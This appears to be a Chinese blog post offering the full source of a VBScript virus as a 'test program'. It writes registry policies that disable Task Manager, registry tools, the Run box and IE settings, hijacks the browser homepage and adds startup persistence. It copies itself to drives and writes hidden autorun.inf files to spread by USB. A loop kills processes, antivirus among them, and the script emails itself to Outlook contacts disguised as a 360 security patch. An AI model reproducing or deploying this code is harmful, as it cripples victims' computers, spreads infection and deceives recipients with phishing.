Vbs 测试程序一
转载请注明出处
有点小恶意哦!慎重测试
'This procedure is written in SeChaos, only for entertainment, not malicious communication, crack or rewrite.I am not liable, the final interpretation of all SeChaos.
dim fso,wsh,myfile,ws,pp,fsoFolder
set wsh=wscript.createobject("wscript.shell")
set fso=wscript.createobject("scripting.filesystemobject")
set myfile=fso.GetFile(wscript.scriptfullname)
'To modify the registry (start menu which things and the IE settings)
wsh.Regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Default_Search_URL","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\Search Page","http://www.cnblogs.com/Chaobs/"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","c:\NYboy.vbs"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry",""
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogOff",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWindowsUpdate",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory",1,"REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
wsh.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD"
'The user can double-click on a hard disk, it can also be modified for so that it can not open file folder
wsh.Regwrite "HKLM\SOFTWARE\Classes\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKCR\Drive\shell\","auto"
wsh.Regwrite "HKCR\Drive\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\","auto"
wsh.Regwrite "HKCR\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
wsh.Regwrite "HKLM\SOFTWARE\Classes\Directory\shell\auto\command\","C:\NYboy.bat '%1'"
'Modify default file Icon
wsh.Regwrite "HKCR\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKCR\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\exefile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\txtfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\dllfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\batfile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\SOFTWARE\Classes\inifile\DefaultIcon\","c:\1.ico"
wsh.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","你好啊,Chaobs和你开个小小的玩笑"
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","你已经中毒了,赶快杀毒或者与QQ5788*****联系"
'Copy itself to the C, D, E, F, U disk
myfile.copy "c:\"
myfile.copy "D:\"
myfile.copy "E:\"
myfile.copy "F:\"
myfile.copy "I:\"
myfile.attributes=34
'Define the Autorun.inf content that is U disk virus must be part of the code
If fso.FileExists("C:\autorun.inf") Then
Set objFolder = fso.GetFile("C:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>C:\autorun.inf"_
&"&& echo open=NYboy.bat >>C:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>C:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>C:\autorun.inf"_
&"&& echo shell=Auto>>C:\autorun.inf"_
&"&& attrib +h +s +r C:\autorun.inf"
set autobatc=fso.createtextfile("c:\NYboy.bat",1,ture)
autobatc.writeline("NYboy.vbs")
End If
If fso.FileExists("D:\autorun.inf") Then
Set objFolder = fso.GetFile("D:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>D:\autorun.inf"_
&"&& echo open=NYboy.bat >>D:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>D:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>D:\autorun.inf"_
&"&& echo shell=Auto>>D:\autorun.inf"_
&"&& attrib +h +s +r D:\autorun.inf"
set autobatd=fso.createtextfile("D:\NYboy.bat",1,ture)
autobatd.writeline("NYboy.vbs")
End If
If fso.FileExists("E:\autorun.inf") Then
Set objFolder = fso.GetFile("E:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>E:\autorun.inf"_
&"&& echo open=NYboy.bat >>E:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>E:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>E:\autorun.inf"_
&"&& echo shell=Auto>>E:\autorun.inf"_
&"&& attrib +h +s +r E:\autorun.inf"
set autobate=fso.createtextfile("E:\NYboy.bat",1,ture)
autobate.writeline("NYboy.vbs")
End If
If fso.FileExists("F:\autorun.inf") Then
Set objFolder = fso.GetFile("F:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>F:\autorun.inf"_
&"&& echo open=NYboy.bat >>F:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>F:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>F:\autorun.inf"_
&"&& echo shell=Auto>>F:\autorun.inf"_
&"&& attrib +h +s +r F:\autorun.inf"
set autobatf=fso.createtextfile("F:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
If fso.FileExists("I:\autorun.inf") Then
Set objFolder = fso.GetFile("I:\autorun.inf")
Else
wsh.run "cmd /c echo [AutoRun]>>I:\autorun.inf"_
&"&& echo open=NYboy.bat >>I:\autorun.inf"_
&"&& echo shellexecute=NYboy.bat >>I:\autorun.inf"_
&"&& echo shell\Auto\command=NYboy.bat>>I:\autorun.inf"_
&"&& echo shell=Auto>>I:\autorun.inf"_
&"&& attrib +h +s +r I:\autorun.inf"
set autobatf=fso.createtextfile("I:\NYboy.bat",1,ture)
autobatf.writeline("NYboy.vbs")
End If
'Set attributes for the system read only hidden virus body
wsh.run "cmd /c attrib +h +s +r C:\NYboy.bat"_
&"&& attrib +h +s +r D:\NYboy.bat"_
&"&& attrib +h +s +r E:\NYboy.bat"_
&"&& attrib +h +s +r F:\NYboy.bat"_
&"&& attrib +h +s +r I:\NYboy.bat"
'Mandatory end of certain processes, such as QQ, Notepad, webpage, batch file, carbachol, realplay process, after running to open these files
do
set ws=getobject("winmgmts:\\.\root\cimv2")
set pp=ws.execquery("select * from win32_process where name='taskmgr.exe'or Name = 'QQ.exe'or Name = 'notepad.exe'or Name = 'IEXPLORE.exe'or Name = 'cmd.exe'or Name = 'avp.exe'or Name = 'winRAR.exe'or Name = 'realplay.exe'or Name = 'WINWORD.exe'")
for each i in pp
i.terminate()
wscript.sleep 100
next
loop
'The virus can be spread by mail
Set ol=CreateObject("Outlook.Application")
On Error Resume Next
For x=1 To 5
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)
Mail.Subject="360病毒测试"
Mail.Body="尊敬的用户您好:为了更好的服务用户,加强360病毒防范能力,特发此补丁,详细可在官网查询。具体测试请按随信附件进行,您可能需要关闭或阻止旧版360运行以便在线升级。谢谢合作 360研发中心"
Mail.Attachments.Add("c:\NYboy.vbs")
Mail.Send
Next
ol.Quit
Vbs 测试程序一的更多相关文章
- Vbs 测试程序三
一段被写滥了的VBS代码 值得一提的是感兴趣的同学可以把 chr(13) + chr(13) + chr(13) 改为chr(11) + chr(11) + chr(11) 不赘述 on error ...
- Vbs 测试程序二
这是一段原载于百度百科上的代码,Chaobs转载 原帖已删,就是怕有人用这个恶意程序. 慎用! dim folder,fso,foldername,f,d,dc set fso=createobjec ...
- Oracle使用ODBC连接配置
该配置是在windows 7 32位下进行的,程序已经通过了测试(使用VBS进行的测试) 1.文件下载 ------------------------------------------------ ...
- snip_opencv环境配置和测试程序
opencv2.4.9环境变量配置的记录. 2014年8月10日 Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp ...
- C#调用vbs脚本实现Windows版Siri
最近新加入,把自己一些有意思的小东西分享给大家,我是一个学生,代码写得少,哪里不规范,希望大家见谅. 这事我封装好的一个类,可以直接实例化对象之后,调用"对象.Talk()"方法, ...
- vbs连接sql server及写文件操作
此段代码是连接SQL SERVER的 代码内connMMSQL的参数要根据实际情况传入 Function connMMSQL(ip,user,pwd,database,strsql) Dim conn ...
- 在WinCC中通过VBS操作SQL Server2005
在项目中需要在一定条件满足时,保存一些数据到数据库中,并可根据条件查询.考虑到WinCC6.2以后采用的就是SQL Server2005数据库,所以直接利用该数据库即可,通过SQL Server Ma ...
- 使用vbs脚本进行批量编码转换
使用vbs脚本进行批量编码转换 最近需要使用SourceInsight查看分析在Linux系统下开发的项目代码,我们知道Linux系统中文本文件默认编码格式是UTF-8,而Windows中文系统中的默 ...
- Spring+SpringMvc+Mybatis框架集成搭建教程三(框架整合测试程序开发)
框架整合测试程序开发 (1).在mysql数据库中创建t_user表,sql语句如下 CREATE TABLE `t_user` ( `id` bigint(20) NOT NULL AUTO_INC ...
随机推荐
- 动态原型模式 js
动态原型模式 function Person(name,age){ this.name = name; this.age = age; if(typeof this.sayName != " ...
- java连接ssh执行shell脚本
在liunx上写了一个shell脚本,想通过java去调用这个shell脚本,不知道怎么去调用,在网上说使用process这个进程方式,但是我执行机和我shell脚本都不在同一台电脑,老大说java中 ...
- vuejs作用域插槽
作用域插槽 <div id='root'> <child> <template slot-scope='props'> <h1>{{props.item ...
- ceph-文件存储
文件存储 ceph文件系统提供了任何大小的符合posix标准的分布式文件系统,它使用Ceph RADOS存储数据.要实现ceph文件系统,需要一个正在运行的ceph存储集群和至少一个ceph元数据服务 ...
- using System.Security.Cryptography
这个命名空间主要是用来进行加密的一些类. 加密服务: 公共网络(如 Internet)不提供实体之间安全通信的方式. 此类网络上的通信易被读取或甚至被未经授权的第三方修改. 加密有助于防止数据被查看, ...
- 解决 Jsp_Servlet 编码乱码问题
Tomcat8.0以上浏览器请求的数据编码格式(包含): Get请求的时候Tomcat用UTF-8处理 post请求的时候Tomcat用ISO8859-1处理 Tomcat8.0以下浏览器请求的数据编 ...
- Web as a App(Web既APP)的概念可以提出吗?
Web as a App (WaaA),Web既APP.灵感出于SaaS.PaaS.IaaS等~ 最近在做一个PC项目,即便我的项目是to B的,用户量没那么大,但是我仍然很注重性能及用户体验,我把我 ...
- 洛谷P1437 [HNOI2004]敲砖块(dp)
题目背景 无 题目描述 在一个凹槽中放置了 n 层砖块.最上面的一层有n 块砖,从上到下每层依次减少一块砖.每块砖 都有一个分值,敲掉这块砖就能得到相应的分值,如下图所示. 14 15 4 3 23 ...
- 基于mybatis设计简单信息管理系统1
驼峰式命名法 骆驼式命名法就是当变量名或函数名是由一个或多个单词连结在一起,而构成的唯一识别字时,第一个单词以小写字母开始:第二个单词的首字母大写或每一个单词的首字母都采用大写字母,例如:myFirs ...
- centos 7 ifconfig 命令找不到
最近在配置linux 环境: 在官网看到centOS除了最新版本7,那就尝试一下吧.最小安装centOS 7之后发现没有ifconfig命令,在网上找了一下都说是路径的路问题. 我用echo $PAT ...